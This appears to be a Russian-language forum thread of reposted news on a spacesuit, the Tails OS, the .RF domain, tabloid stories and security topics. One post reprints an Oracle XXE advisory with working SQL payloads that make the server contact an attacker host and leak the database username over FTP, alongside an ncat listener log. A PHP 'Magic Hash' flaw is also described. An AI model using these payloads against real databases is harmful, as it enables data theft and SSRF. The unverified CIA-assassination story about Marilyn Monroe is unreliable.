Общая тема Другие Новости [Всё то, о чём Вы хотели сообщить..]

Discussion in 'Мировые новости. Обсуждения.' started by Suicide, 12 Aug 2012.

  1. Suicide

    Suicide Super Moderator
    Staff Member

    Joined:
    24 Apr 2009
    Messages:
    2,339
    Likes Received:
    2,502
    Reputations:
    691
    Да ну.. Не сказала бы, что готовлю борщ хуже, чем какая-то украинка..
     
  2. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    1,095
    Likes Received:
    514
    Reputations:
    173
    Думаю дело то не в борще..
     
  3. Suicide

    Suicide Super Moderator
    Staff Member

    Joined:
    24 Apr 2009
    Messages:
    2,339
    Likes Received:
    2,502
    Reputations:
    691
    NASA показало прототип скафандра для путешествия на Марс


    [​IMG]

    Американское аэрокосмическое агентство NASA представило новый прототип скафандра, предназначенного для астронавтов, которые высадятся на Марсе.

    Прототип получил название Z-2 и является усовершенствованным вариантом представленного в 2012 году прототипа марсианского скафандра Z-1. Изображение астронавта в скафандре Z-2 опубликовано на сайте NASA (в полном размере 1920 x 1080 пкс его можно увидеть здесь ).

    [​IMG]
    Прототип марсианского скафандра Z-2

    Как отмечается в сообщении NASA, окончательный вариант этого скафандра будет разработан к ноябрю 2014 года, после чего начнется его тестирование.

    02.05.2014
    http://news.softodrom.ru/ap/b19634.shtml​
     
  4. cleric.80

    cleric.80 Elder - Старейшина

    Joined:
    28 Mar 2008
    Messages:
    522
    Likes Received:
    188
    Reputations:
    12
    Вышел первый релиз анонимной ОС, которой пользуется Сноуден

    Операционная система Tails 1.0, позволяющая полностью скрывать свое присутствие в Сети, стала доступна для пользователей. Система полностью размещается в ОЗУ и не копирует файлы на жесткий диск, а для всех типов коммуникаций использует анонимную сеть Tor, которая не позволяет отследить местоположение пользователя. Для запуска Tails можно использовать любой ПК, не оставляя следов.

    [​IMG]

    Проект The Amnesic Incognito Live System или просто Tails объявил о выходе первого релиза анонимной операционной системы с одноименным названием — Tails 1.0.

    На разработку Tails ушло более 5 лет. Первая публичная версия ОС была представлена в июне 2009 г. и называлась Amnesia. С тех пор было выпущено 36 стабильных версий, включая Tails 1.0.

    Tails — это полноценная ОС, базирующаяся на Debian GNU/Linux. У системы открытый исходный код, созданный сообществом анонимных разработчиков.

    ОС предлагается со всем необходимым встроенным ПО, включая веб-браузер, клиент для обмена мгновенными сообщениями, пакет офисных приложений, редакторы изображений и звука и др.

    Кроме того, в состав Tails входит набор средств шифрования трафика для всех видов коммуникаций: LUKS — для шифрования файлов, HTTPS Everywhere — веб-трафика, OpenPGP — писем, а OTR — мгновенных сообщений. Также в комплект входит шредер файлов Nautilus Wipe.

    Основная задача Tails — скрывать присутствие пользователя сети. Помимо этого система позволяет преодолевать цензуру в интернете, то есть помогает открывать заблокированные по этой причине сайты.

    Для выполнения этих задач Tails использует анонимную сеть Tor. Tor — это сеть пользовательских компьютеров, которые пропускают через себя трафик, стирая его след. В результате, становится невозможно вычислить, кто именно в сети просматривает конкретный сайт.

    Сеть Tor изначально была военным проектом США, но впоследствии разработчики открыли ее код и сделали доступной всем желающим.

    Если какое-либо приложение в Tails попытается подключиться к интернету напрямую, минуя сеть Tor, соединение будет заблокировано.

    Запустить Tails можно с DVD, USB-флешки или SD-карты независимо от того, какая ОС установлена на компьютере. При этом система не копирует файлы на жесткий диск, а полностью размещается в ОЗУ. Когда пользователь заканчивает работу в Tails или выключает компьютер, все данные ОС из ОЗУ исчезают. Таким образом, пользователь не оставляет следов, а ПК затем можно продолжить использовать с той ОС, которая на нем стояла.

    Как пишет CNet, этой операционной системой пользуется Эдвард Сноуден (Edward Snowden) для связи с журналистами. Сноуден — бывший сотрудник АНБ и ЦРУ, который раскрыл множество сведений о работе американской разведки и нашел убежище в России.

    Согласно официальному сайту проекта, работа над Tails будет продолжена. Ближайшее обновление — Tails 1.1 — планируется выпустить в июне.

    Также в планах разработчиков уже прописаны Tails 2.0 и Tails 3.0. Во второй версии они намерены сконцентрироваться на функциях обслуживания ОС, скорости выпуска обновлений; в третьей — на повышении уровня безопасности, включая внедрение технологии изолирования приложений. Сроки выпуска этих версий не сообщаются.

    Источник cnews.ru
    скачать https://tails.boum.org/index.en.html
     
  5. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    1,095
    Likes Received:
    514
    Reputations:
    173
    Первому кириллическому домену .РФ – 4 года!

    [​IMG]

    Четыре года назад, 12 мая 2010 года, в России появился новый национальный домен - .РФ, ставший первым кириллическим доменом в мире. Администратором нового корневого домена официально стал Координационный центр национального домена сети Интернет.
    На сегодняшний день в домене .РФ зарегистрировано 820,538 доменных имен, из них делегировано 651,161 доменное имя или почти 80% от общего числа, что на 5% больше чем в прошлом году. Всего за прошедший год домен .РФ вырос на 3.8%.

    На 185,056 (22.6%) доменных именах в домене .РФ размещены работающие вебсайты, еще на 112,314 (13.7%) доменных именах сайты находятся в стадии разработки. 16.2% (132,972) доменных имен используются для парковки, а 11.2% (92,238) - для редиректа.

    76,4% доменных имен зарегистрировано физическими лицами, 23,6% - юридическими.

    37.4% доменных имен в домене .РФ имеет возраст 3 года и старше. Интересно, что в .RU этот показатель немного ниже – здесь таких доменных имен насчитывается 35.7%.

    Средняя длина доменного имени в домене .РФ составляет 11.1 символа. Для сравнения: средняя длина доменного имени в .RU – 9.6 символа.

    Источник: Cctld.ru ​
     
  6. Suicide

    Suicide Super Moderator
    Staff Member

    Joined:
    24 Apr 2009
    Messages:
    2,339
    Likes Received:
    2,502
    Reputations:
    691
    тьфу ты.. быстро время летит..

    источник ссылку надо указывать ага.
     
  7. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    2,667
    Likes Received:
    5,392
    Reputations:
    325
    В свете последних законотворческих инициатив в отношении рунета, домену .РФ не долго осталось.
     
    _________________________
  8. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    1,095
    Likes Received:
    514
    Reputations:
    173
    наивный
     
  9. NTaker

    NTaker Member

    Joined:
    10 Dec 2013
    Messages:
    92
    Likes Received:
    78
    Reputations:
    15
    кто был первым?
     
  10. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    1,095
    Likes Received:
    514
    Reputations:
    173
    Бывший агент ЦРУ признался в убийстве Мэрилин
    Монро


    Утечка данных из региональной прессы в США может объяснить загадку смерти Мэрилин Монро. Оказывается, в небольшом госпитале штата Вирджиния один из пациентов на смертном одре признался, что он — тот самый киллер, который по заданию ЦРУ убил звезду Голливуда и еще больше 30 артистов, политиков, журналистов и общественных лидеров.​

    Норман Ходжес сказал, что он стоял во главе пятерки профессионалов, которые подстраивали все, чтобы смерть людей, опасных для власти, выглядела как несчастный случай. Вот что рассказал Ходжес о подготовке убийства Монро.

    "У нас появилось свидетельство того, что Мэрилин Монро переспала не только с Кеннеди, но и с Фиделем Кастро. Мой начальник Джимми Хэйворт сказал, что она должна умереть, и я должен устроить, чтобы все выглядело как суицид или передозировка. Мне раньше не приходилось убивать женщин, но я подчинился приказу. Я сделал это для Америки! Ведь Монро могла передавать коммунистам стратегически важную информацию, а мы не могли допустить этого".

    Норман Ходжес сейчас находится в палате для умирающих в наручниках. ФБР восприняли его признание как очень серьезное обвинения против секретной службы. Сейчас идет расследование. Скандал уже вышел на общемировой уровень. Хотя факты до сих пор не проверенные. Впрочем, Ходжес называет одного из своих руководителей, а это не последний человек в ЦРУ. Он скончался от сердечного приступа в 2001 году. Коллеги Ходжеса из спецподразделения тоже умерли.



    Мерилин Монро была жестоко убита по приказу Роберта Кеннеди

    В документальной книге «Убийство Мерилин Монро: дело закрыто» журналисты пишут, что Монро ликвидировали, когда она попыталась рассказать публике о грязных тайнах клана Кеннеди, во многие из которых оказалась вовлечена лично. Убрать Монро с дороги Роберту помогли актер Питер Лоуфорд и психиатр актрисы Ральф Гринсон, который вколол ей в сердце смертельную дозу пентобарбитала. Финальному акту трагедии предшествовал внезапный и сумбурный роман Роберта Кеннеди с Мерилин Монро. Случилось это, когда Джон Кеннеди направил брата в Лос-Анджелес с целью убедить Монро не названивать ему в Белый дом. Роберт должен был объяснить Монро, что Джон не собирается разводиться с супругой Жаклин и жениться на Мерилин. В ходе переговоров с актрисой Роберт сам оказался в ее постели.

     
  11. Suicide

    Suicide Super Moderator
    Staff Member

    Joined:
    24 Apr 2009
    Messages:
    2,339
    Likes Received:
    2,502
    Reputations:
    691
    Человечеству предрекли вымирание через 1000 лет

    [​IMG]

    Человечество должно осваивать космос и, в конце концов, поселиться за пределами Земли, иначе оно обречено на вымирание. Такую точку зрения выразил всемирно известный британский физик-теоретик Стивен Хокинг во время лекции, транслировавшейся в Сиднейском оперном театре, где он общался с публикой с помощью голографической технологии, находясь в своем офисе в Кембриджском университете, сообщает во вторник ТАСС.

    «Мы должны продолжить исследовать космос ради будущего человечества. Я не думаю, что мы проживем следующую тысячу лет, не исчезнув с нашей недолговечной планеты», – сказал он.

    Хокинг неоднократно предупреждал научное сообщество об опасности, которую представляет для мира искусственный интеллект, провоцирующий всплеск человеческой агрессии и варварства.

    Ранее Хокинг также высказывал мнение, что людям надлежит колонизировать другие планеты, чтобы обеспечить «страхование жизни» своего вида. По мнению ученого, иных путей сохранения человечества как такового может просто не оказаться. Помимо этого, Хокинг также предостерегал жителей Земли от общения с инопланетянами.

    Стивен Хокинг традиционно входит в различные списки умнейших людей планеты. Считается, что его IQ составляет 160 баллов.

     
  12. Suicide

    Suicide Super Moderator
    Staff Member

    Joined:
    24 Apr 2009
    Messages:
    2,339
    Likes Received:
    2,502
    Reputations:
    691
    Ученые 17 лет принимали за сигналы из космоса помехи от микроволновки

    [​IMG]

    Почти 17 лет потребовалось ученым из обсерватории «Паркс» (Parkes) в Австралии, чтобы понять, что сигналы, которые они все это время регулярно ловили примерно 1-2 раза в год, принимая их за сигналы из космоса, на самом деле являются помехами от микроволновой печи на кухне в обсерватории, пишет 11 мая BusinessInsider.

    Это выяснилось после того, как в обсерватории сменили приемное оборудование, которое смогло ловить сигналы на частоте 2,4 ГГц. Как оказалось, электромагнитные волны на этой частоте генерировались микроволновкой в тех случаях, когда готовивший еду человек открывал дверцу печки, не дождавшись окончания разогрева еды.

     
    seostock and user100 like this.
  13. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    794
    Likes Received:
    913
    Reputations:
    58
    С секюритиЛАБ украл. Кстати там заканчивается действие ССЛ сертификата
    Специалист WhiteHat Security Роберт Хансен (Robert Hansen) обнаружил уязвимость, которая получила название Magic Hash. Брешь позволяет хешировать входные данные при помощи PHP-инструментов определенным образом и как следствие получить доступ к паролям и другим функциям систем, которые используют сравнение PHP-хеша.



    Хансен сообщил, что практически любой сайт подвергается опасности из-за уязвимости Magic Hash. Проблема возникает после того, как используются операторы «!=» и «==». Каждый раз, когда любой из этих операторов получает для сравнения хэш-сумму, каждый хешированный элемент, который начинается с «0e» с нулем в качестве значения для него, обрабатывается сайтом при помощи PHP.



    В случае, если хеш-суммы двух паролей начинаются с «0e», написанная на PHP система будет перехватывать их, поскольку оба будут иметь одинаковое значение 0. Несмотря на то, что связанные с этими двумя паролями хеш-суммы будут различными в целом, PHP-система рассматривает их как идентичные, если используется оператор «!=» или «==».



    Брешь затрагивает главным образом работу системы аутентификации, а также потоки данных функции возобновления пароля и cookie-файлы. Хансен заявил, что это полностью зависит от web-сайта и от того, как он построен.



    Нет никаких сомнений, что возможные последствия подобной уязвимости огромны, поскольку она позволяет злоумышленникам скомпрометировать учетную запись пользователя, вставляя строку кода всякий раз, когда значение хеш-суммы приравнивается к нулю. По словам Хансена, если пароль сохранен в таком же виде и в базе, то злоумышленник легко получит доступ к учетной записи.
     
    user100 and Suicide like this.
  14. Suicide

    Suicide Super Moderator
    Staff Member

    Joined:
    24 Apr 2009
    Messages:
    2,339
    Likes Received:
    2,502
    Reputations:
    691
    Как делаются отвертки со сменными насадками
     
  15. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    794
    Likes Received:
    913
    Reputations:
    58
    Описание уязвимости

    Модуль XML-парсера базы данных Oracle уязвим к XXE-инъекции (XML External Entity).

    Уязвимые версии: 11.2.0.3, 11.2.0.4, 12.1.0.1 и 12.1.0.2

    Необходимый уровень привилегий: Создание сессии

    Технические детали

    Из-за настроек безопасности XML-парсера в Oracle внешняя схема преобразуется (resolve), но не анализируется. Таким образом, предотвращается использование некоторых типов XXE-инъекций, например, связанных с чтение локальных файлов на удаленном сервере базы данных. Однако злоумышленник может отослать специальный SQL-запрос для вызова XML Resolver'а, заставляя сервер соединиться с удаленным ресурсом через HTTP или FTP. Этот трюк позволяет просачиваться информации через посторонние каналы, выполнять сканирование портов на удаленных внутренних системах, выполнять SSRF-атаки (Server-Side Request Forgery, Межсерверная подделка запросов) или создавать условия для DoS-атак.

    Уязвимые обработчики URI:

    · http:

    · ftp:

    XML-парсер в Oracle может быть вызван при помощи функции extractvalue() для объектаxmltype. Ниже показан пример запроса с простейшей полезной нагрузкой в XXE-инъекции:

    select extractvalue(xmltype('<!ENTITY xxe SYSTEM "etc/passwd">]>'|| '&' ||'xxe;'),'/l') from dual;

    Если выполнить вышеуказанный запрос, возникнет следующая ошибка:

    ORA-31001: Invalid resource handle or path name "/etc/passwd"
    ORA-06512: at "SYS.XMLTYPE", line 310
    ORA-06512: at line 1
    31001. 00000 - "Invalid resource handle or path name \"%s\""
    *Cause: An invalid resource handle or path name was passed to
    the XDB hierarchical resolver.
    *Action: Pass a valid resouce handle or path name to the hierarchical
    resolver.

    Ошибка возникает по причине того, что обработчик FILE URI конвертируется в путь к XDB Repository. Однако изменение запроса и использование обработчика HTTP URI вызывает другую ошибку.

    Пример:

    select extractvalue(xmltype('<!ENTITY xxe SYSTEM "http://IP/test">]>'|| '&' ||'xxe;'),'/l') from dual;

    Возникает следующая ошибка:

    ORA-31020: The operation is not allowed,
    Reason: For security reasons, ftp and http access over XDB repository is not allowed on server side
    ORA-06512: at "SYS.XMLTYPE", line 310
    ORA-06512: at line 1
    31020. 00000 - "The operation is not allowed, Reason: %s"
    *Cause: The operation attempted is not allowed
    *Action: See reason and change to a valid operation.

    Ошибка, приведенная выше, означает, что обработчики FTP URI или HTTP URI могут быть приняты XML-парсером. Обратите внимание, что запрос, приведенный выше, не отсылает никакие HTTP-запросы к системе злоумышленника. Давайте рассмотрим еще одну полезную нагрузку, которая привязана к Parameter Entity вместо Document Entity:

    select extractvalue(xmltype('<?xml version="1.0"
    encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "
    http://IP/test"> %remote; %param1;]>'),'/l') from dual;

    При запуске запроса выше на сервере баз данных возникнет та же сама ошибка (ORA-31020). Однако в этот раз сервер отсылает HTTP-запрос на ресурс с именем «test». Ниже приведен лог HTTP-запросов с сервера злоумышленника:

    ncat -lvp 80
    Ncat: Version 6.25 ( http://nmap.org/ncat )
    Ncat: Listening on :::80
    Ncat: Listening on 0.0.0.0:80
    Ncat: Connection from DB_IP.
    Ncat: Connection from DB_IP:27320.
    GET /test HTTP/1.0
    Host: DB_IP
    Content-Type: text/plain; charset=utf-8

    Обычно злоумышленнику требуется привилегированный доступ к пакету UTL_HTTP для того, чтобы спровоцировать сервер на создание HTTP-запросов к внешнему ресурсу. Поскольку функция extractvalue() доступна всем пользователям, XXE-инъекция предоставляет еще один способ отсылки «внеплановых» запросов без использования дополнительных привилегий.

    Обработчик FTP URI (ftp:) также может использоваться для вызова XML Resolver’a в Oracle. Запрос, приведенный ниже, отсылает имя пользователя базы данных как имя пользователя FTP-сервера:

    select extractvalue(xmltype('<?xml version="1.0" encoding="
    UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "
    ftp://'||user||':bar@IP/test"> %remote; %param1;]>'),'/l') from dual;

    После запуска запроса возникает следующая ошибка (обратите внимание, что код ошибки отличается, поскольку предоставленные учетные данные не могут быть использованы для авторизации на удаленном FTP-сервере).

    ORA-31011: XML parsing failed
    ORA-19202: Error occurred in XML processing
    LPX-00202: could not open "ftp://SYSTEM:bar@IP/test" (error 402)
    Error at line 1
    ORA-06512: at "SYS.XMLTYPE", line 310
    ORA-06512: at line 1
    31011. 00000 - "XML parsing failed"
    *Cause: XML parser returned an error while trying to parse the document.
    *Action: Check if the document to be parsed is valid.

    Имя пользователя базы данных включено в FTP-трафик и отсылается на сервер злоумышленника как имя пользователя FTP-сервера:

    [​IMG]

    Рисунок 1: Попытка соединения с FTP-сервером при помощи учетной записи базы данных

    Рекомендации

    Установите обновление CPUJan2015, выпущенное компанией Oracle.
    Украс с секюритиЛАБ.РУ
     
    Suicide likes this.
  16. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    794
    Likes Received:
    913
    Reputations:
    58
    так написано же уборка, борщ, интим.
    Кстати из скрина видно СерГЕЙ 24 ЛЕТ. но что то у него табло старое для 24 ЛЕТ
     
  17. Вадим

    Вадим New Member

    Joined:
    25 May 2015
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Доброго дня.
    Собственно заинтересовала эта новость. http://tass.ru/obschestvo/1984868
    Прежде всего интересуют последствия этого закона для партнерских программ и продаж с товаров с одностраничников.
    Если я правильно понял, то отношение имеет именно к партнерским программам.
    Кто что думает по этому поводу?
     
  18. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    2,667
    Likes Received:
    5,392
    Reputations:
    325
    Миллиардер арендовал известную порнозвезду на 15 лет

    [​IMG]
    22-летняя порнозвезда русско-японского происхождения Рола Мисаки, также известная, как Рола Такизава, больше не принадлежит ни себе, ни своим поклонникам. Узкопрофильная актриса продалась на 15 лет в рабство за 7,5 миллионов долларов. Отныне ее хозяин неизвестный китайский миллиардер, сообщает Metro.



    Неизвестного мужчину в маске видели в компании Ролы Такизавы на нескольких светских мероприятиях в Пекине. Согласно 15-летнему контракту, который заключила 22-летняя девушка с китайским предпринимателем, она больше не имеет права сниматься в фильмах для взрослых.


    Многочисленные поклонники Ролы восприняли новость о сдаче их любимицы в аренду крайне негативно. "Как она могла так поступить с нами? Она была едва ли не самой естественной и натуральной актрисой в жанре. Это просто возмутительно", — написал один из фанатов Такизавы в китайской социальной сети Weibo.


    Рола Такизава дебютировала в порнобизнесе в 2012 году, и с тех пор обрела большую армию фанатов, в основном из Китая.
    [​IMG]

    22 мая 2015

     
    _________________________
    Suicide likes this.
  19. Suicide

    Suicide Super Moderator
    Staff Member

    Joined:
    24 Apr 2009
    Messages:
    2,339
    Likes Received:
    2,502
    Reputations:
    691
    Угу.. уже обсуждали это, но в другом месте.. В общем вывод такой: продажа себя за деньги и в рабство - нынче называется арендой.. Хотя некоторые поддерживают такое понятие и видят в нём плюсы..
     
  20. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    794
    Likes Received:
    913
    Reputations:
    58
    Представьте что он её поцелует. :D
     
Loading...